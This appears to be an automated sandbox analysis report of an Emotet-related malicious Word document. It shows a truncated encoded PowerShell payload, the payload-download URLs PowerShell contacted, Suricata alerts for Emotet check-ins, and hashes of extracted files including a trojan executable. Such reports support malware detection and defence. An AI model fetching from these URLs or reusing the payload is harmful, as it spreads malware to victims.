DgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))
(PID: 3052)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
www.utilitybillingsoftwares.com
OSINT |
173.203.172.88
TTL: 12990 |
Wild West Domains, LLC
Organization: Shelly Webber Consulting Name Server: NS.RACKSPACE.COM Creation Date: Wed, 02 Jun 2010 21:19:30 GMT |
United States |
www.erzotech.eu |
94.199.180.228
TTL: 3599 |
- | Hungary |
t-p-e.net
OSINT |
217.160.0.130
TTL: 2875 |
1&1 Internet SE
Organization: KHELIFA YACINE Name Server: NS1114.UI-DNS.BIZ Creation Date: Sat, 11 Jan 2014 12:00:48 GMT |
Germany |
amor.official.pw |
69.175.93.166
TTL: 10574 |
- | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
173.203.172.88 |
80
TCP |
powershell.exe PID: 2096 |
United States |
69.175.93.166 |
80
TCP |
powershell.exe PID: 2096 |
United States |
217.160.0.130 |
80
TCP |
powershell.exe PID: 2096 |
Germany |
94.199.180.228 |
80
TCP |
powershell.exe PID: 2096 |
Hungary |
91.217.66.130 |
443
TCP |
homenvidia.exe PID: 3456 |
Ukraine |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
173.203.172.88:80 (www.utilitybillingsoftwares.com) | GET | www.utilitybillingsoftwares.com/Yr13ok/ | GET /Yr13ok/ HTTP/1.1
Host: www.utilitybillingsoftwares.com
Connection: Keep-Alive More Details |
69.175.93.166:80 (amor.official.pw) | GET | amor.official.pw/f3sqVF/ | GET /f3sqVF/ HTTP/1.1
Host: amor.official.pw
Connection: Keep-Alive More Details |
217.160.0.130:80 (t-p-e.net) | GET | t-p-e.net/M8uZOL/ | GET /M8uZOL/ HTTP/1.1
Host: t-p-e.net
Connection: Keep-Alive More Details |
94.199.180.228:80 (www.erzotech.eu) | GET | www.erzotech.eu/esimB50/ | GET /esimB50/ HTTP/1.1
Host: www.erzotech.eu
Connection: Keep-Alive More Details |
91.217.66.130:443 | GET | 91.217.66.130/esimB50/ | GET /esimB50/ HTTP/1.1
Host: www.erzotech.eu
Connection: Keep-Alive More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 69.175.93.166:80 (TCP) | Potentially Bad Traffic | ET INFO HTTP Request to a *.pw domain | 2016777 |
local -> 91.217.66.130:443 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet.v4 Checkin | 2827279 |
local -> 91.217.66.130:443 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet.v4 Checkin 2 | 2827580 |
local -> 91.217.66.130:443 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet.v4 Checkin 3 | 2828008 |
local -> 91.217.66.130:443 (TCP) | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) | 2013926 |
local -> 91.217.66.130:443 (TCP) | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | 2018358 |
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
94.199.180.228 -> local:56508 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
94.199.180.228 -> local:56508 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
94.199.180.228 -> local:56508 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
Extracted Strings
Extracted Files
-
Malicious 1
-
-
195082.exe
- Size
- 132KiB (135168 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Trojan.Generic" (34/67)
- Runtime Process
- 195082.exe (PID: 2840)
- MD5
- ee8ecae6ff9c0e9c0c64a9ac8bc68b28
- SHA1
- 9b50606a0a7d4e7de61e008c7418e5c2e4e7514f
- SHA256
- 0fc4143af0aa01b02806484b5f289884570eab7821fa38480f22d53de57752fe
-
-
Clean 1
-
-
~$9168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/59
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
-
Informative 5
-
-
129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 31 09:15:39 2018, mtime=Wed Jan 31 09:15:39 2018, atime=Wed Jan 31 09:16:04 2018, length=226304, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 614f1e0a25aeabf5662c0cb63f5ceb3a
- SHA1
- a0152729e4407cb0b4d6e56726d8f80b5e27906b
- SHA256
- 7c932068f895d4d38e69fb1359f7511eb7ca1eb030161774bd8418562c47306a
-
index.dat
- Size
- 224B (224 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- c74b075f627e6dac016707e8738818a4
- SHA1
- 002fb229fdd21285fea544d6584992d1968a9635
- SHA256
- b9bf0cc87e4d9b46af221b54fb924062d8b1cff3474bd1d7431ef0f6b767b3cf
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
8TCMB5ZGMHB3S9U7XP4L.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2096)
- MD5
- 0ec3597603855b71f181368c8be27d5b
- SHA1
- e586ca08889c31a17a392a84047793a685b816fc
- SHA256
- 7aa6c4512e69d776f41e7db3c44782c106256a0e511588eb8ce4f424545d4144
-
~WRS{6F053C44-FAC4-4CB6-B75C-D30842EE3494}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report